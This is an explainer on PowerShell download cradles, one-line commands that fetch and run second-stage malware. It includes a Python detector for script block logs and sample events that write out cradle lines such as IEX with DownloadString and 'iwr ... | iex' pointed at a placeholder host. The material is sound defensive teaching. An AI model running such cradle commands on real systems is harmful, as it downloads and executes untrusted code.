What Are Download Cradles? (PowerShell/Malware)
TL;DR
A download cradle is a one-line piece of code whose main job is to download additional malicious code with further functionality from a remote location and execute it.
A download cradle is a single-line command for download and code execution. It is typically seen at the end of a maldoc or exploit, implementing the second-stage download of the exploit/infection within the attack lifecycle. A download cradle can also be part of a persistence mechanism, tooling, or execution at other attack stages when an attacker attempts to download capability or run filelessly.
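As an added example (not from the original post or the linked projects), the Python below flags PowerShell script block log text in which a download call and a string-execution call appear on the same line, which is the pattern described above. The sample events, the host `example.invalid` and the function names are constructed for illustration.

```python
import re

# Calls and aliases that fetch remote content (real PowerShell/.NET names).
DOWNLOAD = re.compile(
    r"\b(?:DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|iwr|"
    r"Invoke-RestMethod|irm|Start-BitsTransfer)\b",
    re.IGNORECASE,
)
# Calls and aliases that execute a string as code.
EXECUTE = re.compile(r"\b(?:Invoke-Expression|iex)\b", re.IGNORECASE)

# Constructed script block logging (event 4104) text, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"},
    {"id": 2, "text": "iwr http://example.invalid/s.ps1 | iex"},
    {"id": 3, "text": "Invoke-WebRequest https://example.invalid/tool.zip -OutFile C:\\Temp\\tool.zip"},
    {"id": 4, "text": "$cmd = 'Get-Date'\nInvoke-Expression $cmd"},
]


def find_cradle(script_text):
    """Return [(line_no, download_tokens, execute_tokens)] for lines with both kinds."""
    hits = []
    for line_no, line in enumerate(script_text.splitlines(), start=1):
        downloads = sorted({m.lower() for m in DOWNLOAD.findall(line)})
        executes = sorted({m.lower() for m in EXECUTE.findall(line)})
        # A cradle is download AND execute in one command; either alone is common admin use.
        if downloads and executes:
            hits.append((line_no, downloads, executes))
    return hits


def flagged_ids(events):
    """Return the ids of events whose script text contains a cradle-shaped line."""
    return [e["id"] for e in events if find_cradle(e["text"])]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        for line_no, downloads, executes in find_cradle(event["text"]):
            print(f"event {event['id']} line {line_no}: download={downloads} execute={executes}")
```

Plain token matching like this will not match obfuscated cradles such as those produced by Invoke-CradleCrafter, so treat a hit as a lead and a miss as inconclusive.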
References
https://github.com/danielbohannon/Invoke-CradleCrafter
Powershell Download Cradles
https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
What is an IEX download cradle?
https://security.stackexchange.com/questions/109905/what-is-an-iex-download-cradle